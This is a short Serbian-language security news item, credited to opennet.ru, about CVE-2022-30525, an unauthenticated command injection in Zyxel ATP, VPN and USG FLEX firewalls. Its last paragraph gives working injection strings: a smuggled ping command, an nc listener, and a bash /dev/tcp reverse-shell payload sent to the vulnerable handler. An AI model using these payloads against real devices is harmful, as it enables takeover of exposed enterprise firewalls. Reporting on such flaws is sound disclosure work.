Ranjivost u Zyxel zaštitnim zidovima koja dozvoljava izvršavanje koda bez autentifikacije

Kritična ranjivost (CVE-2022-30525) identifikovana je u Zyxel uređajima serije ATP, VPN i USG FLEX, dizajniranim da organizuju rad zaštitnih zidova, IDS-a i VPN-a u preduzećima, što omogućava eksternom napadaču da izvrši kod na uređaj bez korisničkih prava bez autentifikacije. Da bi izvršio napad, napadač mora biti u mogućnosti da šalje zahtjeve uređaju koristeći HTTP/HTTPS protokol. Zyxel je popravio ranjivost u ažuriranju firmvera ZLD 5.30. Prema Shodan servisu, trenutno postoji 16213 potencijalno ranjivih uređaja na globalnoj mreži koji prihvataju zahtjeve putem HTTP/HTTPS-a.

Operacija se izvodi slanjem posebno dizajniranih komandi web rukovaocu /ztp/cgi-bin/handleru, dostupnom bez autentifikacije. Problem je uzrokovan nedostatkom pravilnog čišćenja parametara zahtjeva prilikom izvršavanja naredbi na sistemu pomoću poziva os.system koji se koristi u biblioteci lib_wan_settings.py i koji se izvršava prilikom obrade setWanPortSt operacije.

Na primjer, napadač bi mogao proslijediti string “; ping 192.168.1.210;" što će dovesti do izvršenja naredbe “ping 192.168.1.210” na sistemu. Da biste dobili pristup komandnoj ljusci, možete pokrenuti “nc -lvnp 1270” na vašem sistemu, a zatim pokrenuti obrnutu vezu slanjem zahtjeva uređaju sa '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

izvor: opennet.ru

Dodajte komentar